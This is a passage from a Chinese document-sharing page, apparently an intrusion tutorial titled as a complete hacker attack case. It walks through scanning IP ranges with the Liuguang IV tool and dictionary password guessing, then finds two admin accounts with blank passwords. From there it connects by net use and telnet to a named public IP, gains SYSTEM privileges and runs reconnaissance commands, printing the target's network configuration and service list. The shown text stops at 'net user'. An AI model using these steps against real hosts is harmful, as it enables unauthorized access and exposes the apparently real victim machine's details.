黑客攻击完整案例

合集下载
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

黑客完整攻击案例介绍

1.扫描主机发现漏洞

我们用流光IV来扫描一段网址!

点击探测-高级扫描工具!

输入ip地址范围如下图所示

扫描IP地址范围

▪起始地址/结束地址:需要扫描的IP地址范围。

▪目标系统:ALL-所有系统 NT-NT/2000系统 UNIX-UNIX系统,根据选择的不同下面的[检测项目]将会有不同设置。

▪获取主机名:获取主机的名称。

▪检测项目:选择需要扫描的项目,根据选择的不同表单会有所不同。

高级扫描设置

如图3所示你可以自己定义你的用户字典和密码字典。

•猜解用户名字典:设置扫描中采用的用户字典,适用于POP3/FTP/IMAP/SQL/MYSQL。

•猜解密码字典:设置扫描中采用的密码字典,适用于POP3/FTP/IMAP/SQL/MYSQL。

•保存扫描报告:扫描的报告,采用HTML格式。

•并发线程数目:默认80,可以根据情况增减,如果线程数目越大速度越快但是越容易误报和漏报。

•网络选项:设置TCP参数

大概需要20分钟左右扫描结束,扫描结果如下图所示

总之我们得到了两个admin的帐号!mf和lyl密码都是空!

2.使用命令入侵有漏洞主机

我们点击开始运行-输入cmd单击确定

我们在命令提示符下使用net use命令远程连接主机210.192.111.207

如下图所示:

常用的网络入侵命令

这里端口78是黑客自己改的!默认端口是99

如下所示:

TELNET登录到远程主机

我们已经成功登陆到主机210.192.111.207,权限是system 运用网络命令获取远程主机的信息如下图所示

网络命令获取远程主机信息我们首先在名利提示符下输入:

net name

显示那台主机的名字

在输入:ipconfig

看看他的网络配置,有两块网卡一个是内部:192.168.1.4 一个是外部的:210.192.111.207 输入:ver

对方主机显示:

C:\WINNT\system32>ver

Microsoft Windows 2000 [Version 5.00.2195]

C:\WINNT\system32>

C:\WINNT\system32>net start

已经启动以下 Windows 2000 服务:

Alerter

Application Management

COM+ Event System

Computer Browser

DHCP Client

Distributed File System

Distributed Link Tracking Client

Distributed Link Tracking Server

Distributed Transaction Coordinator

DNS Client

Event Log

File Replication Service

FTP Publishing Service

IIS Admin Service

Indexing Service

Intersite Messaging

IPSEC Policy Agent

Kerberos Key Distribution Center

Logical Disk Manager

Messenger

Microsoft Search

Microsoft SMTP Service

MSSQLServer

Net Logon

Network Connections

NT LM Security Support Provider

Plug and Play

Print Spooler

Protected Storage

Remote Procedure Call (RPC)

Remote Procedure Call (RPC) Locator

Remote Registry Service

Removable Storage

RunAs Service

Security Accounts Manager

Server

SQLServerAgent

System Event Notification

Task Scheduler

TCP/IP NetBIOS Helper Service

Windows Management Instrumentation Driver Extensions Windows Time

Workstation

World Wide Web Publishing Service

许可协议登录服务

命令成功完成。

C:\WINNT\system32>

C:\WINNT\system32>net start telnet

Telnet 服务正在启动 .

Telnet 服务已经启动成功。

C:\WINNT\system32>

C:\WINNT\system32>

C:\WINNT\system32>

C:\WINNT\system32>net user

相关文档
最新文档